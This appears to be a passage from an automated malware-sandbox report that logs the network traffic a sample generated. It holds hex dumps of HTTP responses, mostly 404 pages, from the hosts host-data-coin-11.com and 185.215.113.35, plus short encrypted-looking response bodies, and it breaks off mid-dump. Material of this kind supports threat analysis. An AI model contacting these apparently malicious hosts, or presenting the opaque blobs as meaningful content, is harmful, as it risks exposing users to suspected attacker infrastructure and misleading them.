3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Fri, 14 Jan 2022 09:44:25 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: [hex dump omitted] Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 09:44:25 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 48 e5 af 8d 70 bc 57 dd 40 d6 f6 2e 84 2a e8 c3 90 53 2e ef a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9HpW@.*S.c0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 09:44:28 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 09:44:29 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 80 49 08 25 01 e5 e9 8d b0 a2 37 0d 0a 30 0d 0a 0d 0a Data Ascii: 1fI:82OI%70
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 09:44:29 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 67 5d a4 09 d7 cd 66 c7 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OTevg]fdP0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 09:44:30 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 09:44:30 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 46 e8 ae 88 70 bc 57 dd 43 df f9 21 87 26 ec c3 91 50 23 e4 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9FpWC!&P#c0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 09:44:34 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 09:44:34 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 39 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c0 d7 10 55 3a 40 a9 fe c2 aa b9 01 ac 52 cc 77 f8 0f 11 91 1d f4 0d 0a 30 0d 0a 0d 0a Data Ascii: 29I:82OU:@Rw0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Fri, 14 Jan 2022 09:44:35 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingData Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 
33 32 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 09:44:35 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 43 4e c7 3d c2 ec 66 b5 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OTevCN=fdP0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 09:44:47 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Fri, 14 Jan 2022 09:44:47 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 276Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 38 35 2e 32 31 35 2e 31 31 33 2e 33 35 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 185.215.113.35 Port 80</address></body></html>
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 09:44:47 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 43 4e c7 3d c2 ec 66 b5 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OTevCN=fdP0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 09:44:55 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 09:44:55 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 48 e5 af 8d 70 bc 57 dd 40 d6 f6 2e 84 2a e8 c3 90 53 2e ef a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9HpW@.*S.c0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 09:44:59 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 09:44:59 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 49 eb ab 85 70 bc 57 dd 40 d7 fe 26 83 22 eb c3 93 58 28 e3 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9IpW@&"X(c0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 09:45:03 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 